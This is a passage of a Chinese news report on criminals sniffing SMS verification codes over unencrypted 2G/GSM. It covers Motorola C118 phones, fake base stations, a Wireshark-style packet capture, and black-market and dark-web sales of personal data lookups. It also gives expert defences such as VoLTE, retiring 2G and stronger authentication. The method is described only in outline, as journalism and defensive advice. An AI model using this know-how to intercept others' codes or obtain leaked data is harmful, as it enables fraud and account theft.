“2G本來就是開源的,在數(shù)據(jù)傳輸過程中也沒有加密。”隋剛向新京報(bào)記者介紹說,在短信嗅探中,C118手機(jī)只是扮演著一個(gè)偽基站的角色。
偽基站又稱“假基站”,可以利用移動(dòng)信令監(jiān)測(cè)系統(tǒng)監(jiān)測(cè)移動(dòng)通訊過程中的各種信令過程,獲得手機(jī)用戶當(dāng)前的位置信息。按照通信協(xié)議世界的“游戲規(guī)則”,誰(shuí)來先跟你“握手”,設(shè)備便會(huì)優(yōu)先作出回應(yīng)。偽基站啟動(dòng)后就會(huì)干擾和屏蔽一定范圍內(nèi)的運(yùn)營(yíng)商信號(hào),之后則會(huì)搜索出附近的手機(jī)號(hào),主動(dòng)握手,并將短信發(fā)送到這些號(hào)碼上。屏蔽運(yùn)營(yíng)商的信號(hào)可以持續(xù)10秒到20秒,短信推送完成后,對(duì)方手機(jī)才能重新搜索到信號(hào)。
給不法分子可乘之機(jī)的,卻是2G網(wǎng)絡(luò)的天然缺陷。“2G網(wǎng)絡(luò)其架構(gòu)本身就是開源的,其使用的GSM協(xié)議也都是明文傳輸。因?yàn)椴]有加密,所以在傳輸?shù)倪^程中就可以嗅探到。將C118連接至電腦,然后用類似Wireshark的網(wǎng)絡(luò)抓包工具直接抓包,就可以抓出來通信過程中的所有指令。”隋剛說。
其實(shí),聽起來駭人聽聞的GSM短信嗅探技術(shù)并非沒有自己的軟肋。據(jù)隋剛介紹,GSM短信嗅探技術(shù)的短板,主要有兩方面,“一方面是摩托羅拉C118發(fā)射功率有限,黑產(chǎn)從業(yè)者只有在‘獵物’附近時(shí)才能實(shí)現(xiàn)嗅探,距離被嚴(yán)重限制;另一方面是這種方法獲取的信息比較單一,只能獲取短信驗(yàn)證碼,所以只能做與短信驗(yàn)證碼相關(guān)的事情。”
隋剛說:“我們能做的事情還有很多,比如說U盾等實(shí)體二步認(rèn)證硬件就可以很好地防范這種攻擊。”
全鏈條:獲取身份證號(hào)、銀行賬號(hào)、支付賬號(hào)
新京報(bào)記者進(jìn)一步調(diào)查發(fā)現(xiàn),GSM短信嗅探攻擊已基本實(shí)現(xiàn)全鏈條化。在電信用戶的短信驗(yàn)證碼、手機(jī)號(hào)碼被劫持的的基礎(chǔ)上,黑產(chǎn)從業(yè)者可以通過社工庫(kù)等方式獲取身份證號(hào)碼、銀行賬號(hào)、支付平臺(tái)賬號(hào)等敏感信息。
在一個(gè)名為“C118研究社嗅探學(xué)習(xí)群”的QQ群中,一則與查詢個(gè)人信息相關(guān)的廣告顯示,“可查卡查證”。有媒體曾在報(bào)道中提及,記者花費(fèi)700元就買到同事行蹤,包括乘機(jī)、開房、上網(wǎng)吧等11項(xiàng)記錄。在另一個(gè)名為“短信設(shè)備”的QQ群中,一名自稱出售短信號(hào)碼采集器的賣家表示,“通過號(hào)碼采集器可以采集到一定范圍的手機(jī)號(hào)碼。”
在這個(gè)QQ群里,共聚集著377名黑產(chǎn)從業(yè)者。每天,如何“賺大錢”成為群內(nèi)學(xué)習(xí)和討論的焦點(diǎn)。
那么,黑產(chǎn)從業(yè)者是如何通過手機(jī)號(hào)來查到多種個(gè)人信息的呢?新京報(bào)記者發(fā)現(xiàn),通過社工庫(kù)并不難實(shí)現(xiàn)個(gè)人信息的查詢。所謂社工庫(kù),即一個(gè)數(shù)據(jù)資料集合庫(kù),包含有大量被泄露的數(shù)據(jù)。通過這些數(shù)據(jù),社工庫(kù)的使用者可以輕易勾勒出一幅用戶的網(wǎng)絡(luò)畫像。
有接近黑灰產(chǎn)的人士指出,隨著國(guó)內(nèi)監(jiān)管愈發(fā)嚴(yán)格,社工庫(kù)一般只供黑產(chǎn)團(tuán)伙內(nèi)部使用。并且,目前灰產(chǎn)從業(yè)者有向國(guó)外轉(zhuǎn)移的趨勢(shì)。在暗網(wǎng)上的某個(gè)交易市場(chǎng)中,新京報(bào)記者發(fā)現(xiàn)大量包含“個(gè)人信息查詢”的交易帖。其中一則帖子中顯示,可以查戶籍信息、開房信息、婚姻、寬帶。在該交易帖中,根據(jù)查詢信息不同,價(jià)位也從0.014BTC-0.15BTC不等。交易信息一覽中顯示,該商品單價(jià)為1美元,用戶可以通過調(diào)整購(gòu)買數(shù)量來滿足不同需求。在不可追蹤的暗網(wǎng)交易市場(chǎng)中,該服務(wù)“頗有賣相”,截至4月28日,該商品顯示已被購(gòu)買1368次。
■ 分析
短信驗(yàn)證碼安全嗎?
愈演愈烈的黑產(chǎn),引發(fā)人們對(duì)手機(jī)短信驗(yàn)證碼本身是否足夠安全的討論。有關(guān)人士表示,現(xiàn)在手機(jī)驗(yàn)證碼能做到的東西(轉(zhuǎn)賬、實(shí)名等)已經(jīng)遠(yuǎn)遠(yuǎn)超出了它本身安全性的范圍。
據(jù)《2018網(wǎng)絡(luò)黑灰產(chǎn)治理研究報(bào)告》估算,2017年我國(guó)網(wǎng)絡(luò)安全產(chǎn)業(yè)規(guī)模為450多億元,而黑灰產(chǎn)已達(dá)近千億元規(guī)模;全年因垃圾短信、詐騙信息、個(gè)人信息泄露等造成的經(jīng)濟(jì)損失估算達(dá)915億元。而且電信詐騙案每年以20%至30%的速度在增長(zhǎng)。
另?yè)?jù)阿里安全歸零實(shí)驗(yàn)室統(tǒng)計(jì),2017年4月至12月共監(jiān)測(cè)到電信詐騙數(shù)十萬起,案發(fā)資金損失過億元,涉及受害人員數(shù)萬人,電信詐騙案件居高不下,規(guī)模化不斷升級(jí)。2018年,活躍的專業(yè)技術(shù)黑灰產(chǎn)平臺(tái)多達(dá)數(shù)百個(gè)。
那么,面對(duì)規(guī)模如此龐大的黑灰產(chǎn),短信驗(yàn)證碼是否已經(jīng)顯得捉襟見肘了呢?對(duì)此,隋剛認(rèn)為,雖然在嗅探的情景下,短信驗(yàn)證碼并不安全,但是就目前來說,短信驗(yàn)證碼仍是一個(gè)切實(shí)可行的方案。
“就目前情況來看,如果將短信驗(yàn)證碼換成其他的驗(yàn)證方式,無形之中肯定會(huì)加大使用成本。”隋剛告訴新京報(bào)記者,“安全是相對(duì)的,就看愿意付出多大的代價(jià)。與便捷性相平衡,短信驗(yàn)證碼相對(duì)合適。安全本身就是提升攻防雙方的成本,并沒有絕對(duì)的安全。”
如何防范短信嗅探?
那么如何防止被黑產(chǎn)截獲短信呢?2018年2月,全國(guó)信息安全標(biāo)準(zhǔn)化技術(shù)委員會(huì)秘書處發(fā)布《網(wǎng)絡(luò)安全實(shí)踐指南——應(yīng)對(duì)截獲短信驗(yàn)證碼實(shí)施網(wǎng)絡(luò)身份假冒攻擊的技術(shù)指引》。
該指引指出,攻擊者在截獲短信驗(yàn)證碼后,能夠假冒受害者身份,成功通過移動(dòng)應(yīng)用、網(wǎng)站服務(wù)提供商的身份驗(yàn)證安全機(jī)制,實(shí)施信用卡盜刷等網(wǎng)絡(luò)犯罪,給用戶帶來經(jīng)濟(jì)損失。指引同時(shí)指出,缺陷修復(fù)難度大。目前,GSM網(wǎng)絡(luò)使用單向鑒權(quán)技術(shù),且短信內(nèi)容以明文形式傳輸,該缺陷由GSM設(shè)計(jì)造成,且GSM網(wǎng)絡(luò)覆蓋范圍廣,因此修復(fù)難度大、成本高。攻擊過程中,受害者的手機(jī)信號(hào)被劫持,攻擊者假冒受害者身份接入通信網(wǎng)絡(luò),受害者一般難以覺察。
那么,面對(duì)GMS短信嗅探的威脅,我們是否真的束手無策呢?有專家建議,用戶可以要求運(yùn)營(yíng)商開通VoLTE功能(一種數(shù)據(jù)傳輸技術(shù)),從而防范短信被劫持的可能。“也就是說,不再使用2G網(wǎng)絡(luò)傳輸短信,而是讓短信通過4G網(wǎng)絡(luò)傳輸,從而防范無線監(jiān)控竊取短信。”也有專家認(rèn)為,運(yùn)營(yíng)商應(yīng)盡快替換掉2G網(wǎng)絡(luò)。通信運(yùn)營(yíng)商應(yīng)考慮加快淘汰2G網(wǎng)絡(luò)技術(shù),以更大程度確保信息安全。據(jù)介紹,在國(guó)際上,2G網(wǎng)絡(luò)已被諸多運(yùn)營(yíng)商所拋棄。
上述指引也建議各移動(dòng)應(yīng)用、網(wǎng)站服務(wù)提供商優(yōu)化用戶身份驗(yàn)證措施,選用一種或采用多種方式組合,加強(qiáng)安全性:如短信上行驗(yàn)證(提供由用戶主動(dòng)發(fā)送短信用以驗(yàn)證身份的功能)、語(yǔ)音通話傳輸驗(yàn)證碼、常用設(shè)備綁定、生物特征識(shí)別、動(dòng)態(tài)選擇身份驗(yàn)證方式等。
新京報(bào)記者 李大偉 lidawei@xjbnews.com